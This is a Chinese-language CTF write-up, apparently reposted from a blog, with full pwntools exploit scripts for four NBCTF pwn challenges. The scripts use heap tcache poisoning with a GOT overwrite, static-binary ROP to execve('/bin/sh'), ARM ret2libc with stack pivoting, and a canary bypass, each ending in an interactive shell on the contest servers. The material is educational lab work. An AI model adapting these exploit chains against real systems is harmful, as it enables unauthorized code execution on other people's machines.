做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。
heapnotes
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))
def menu(choice):
sla("> ",str(choice))
def add(context):
menu(1)
sla("Input note data: ",context)
def show(index):
menu(2)
sla("): ",str(index))
def edit(index,context):
menu(3)
sla("): ",str(index))
sla("Input note data: ",context)
def free(index):
menu(4)
sla("): ",str(index))
bss=0x404120
add('/bin/shx00')
add('a'*8)
add('/bin/shx00')
free(0)
free(1)
show(1)
heapbase=u64(io.recvline()[:-1].ljust(8,'x00'))-0x2a0
lg("heapbase")
edit(1,'a'*0x10)
free(1)
add(p64(0x404020))
add('a'*8)
add(p64(elf.plt['system']))
show(2)
#gdb.attach(io)
irt()
ribbit
直接写rop硬拿shell就好,不用管它什么所谓的win函数,反正程序是静态编译的,什么gadget都有
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io=gdb.debug('./pwn','b*0x401922')
io=remote("chal.nbctf.com",30170)
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
#io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
#libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))
rdi_ret=0x000000000040201f
rsi_ret=0x000000000040a04e
rdx_ret=0x000000000047fe1a
rax_ret=0x0000000000449267
win=0x401825
puts=0x40c7b0
t_read=0x448800
bss=0x4C6800
syscall=0x0000000000401dd4
payload='a'*0x28+p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(rdx_ret)+p64(8)+p64(t_read)+p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(rdx_ret)+p64(0)+p64(rax_ret)+p64(59)+p64(syscall)
#payload='You got this!'+'x00'*8+'Just do it!'+'x00'*8+p64(rdi_ret)+p64(0xF10C70B33F)+p64(rax_ret)+p64(rsi_ret)+p64(win)
sla("Can you give my pet frog some motivation to jump out the hole?",payload)
io.send('/bin/shx00')
irt()
ret2thumb
用自己的qemu–arm就可以直接怼shellcode,用它给的就不行,有点奇怪,而且每天东这个题和thumb有什么关系,直接泄露libc然后栈迁移到bss上直接rop就行,不过要事先找到能控制r0的gadget,直接ROPgadget搜只能搜到控制fp,r3和r4的gadget,但是仔细找的话会发现如果把0x10500地址处的mov r0,r3;pop {fp,pc} 和pop {r3,pc}结合起来的话是可以做到直接控制r0的这也是为什么可以直接泄露libc去进行rop的原因
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='arm'
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30175)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm", "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm", "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))
main=0x10510
bss=0x12600
gadget=0x104F0
r3_pc=0x00010388
r0_r3=0x10550
payload='a'*0x20+p32(bss)+p32(r3_pc)+p32(elf.got['puts'])+p32(r0_r3)+p32(bss+0x24)+p32(gadget)+p32(0)+p32(bss)
sla("Can you ret2thumb? n",payload)
libcbase=u64(io.recvline()[:-1].ljust(8,'x00'))-libc.sym['puts']
lg("libcbase")
#shellcode=asm(shellcraft.thumb.sh())
system=libcbase+libc.sym['system']
payload='a'*0x24+p32(r3_pc)+p32(bss+0x38)+p32(r0_r3)+p32(bss)+p32(system)+'/bin/shx00'
io.sendline(payload)
irt()
canary-in-a-coal-mine
程序给了gets,还给了在栈上写某条从已知地址出发的链上的任意一个数据,有canary,给了后门,所以直接用大量后门地址覆盖栈然后利用给的功能在bss找一个能指向canary的地址写到对应位置上绕过canary保护就可
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
context.log_level = 'debug'
context.arch='arm'
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30178)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm", "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm", "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))
win=0x10828
def menu(choice):
sla("> ",str(choice))
def mine(index,depth):
menu(1)
sla("mining positionn> ",str(index))
sla("mining depthn> ",str(depth))
def extract(index):
menu(2)
sla("minecart numbern> ",str(index))
def gets(payload):
menu(3)
sla("collapsing mineshaftn> ",payload)
payload=p32(win+1)*0x20
gets(payload)
guard=0x21038
mine(0x21038,2)
extract(8)
menu(4)
irt()
原文地址:https://blog.csdn.net/weixin_46483787/article/details/134752187
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_32188.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。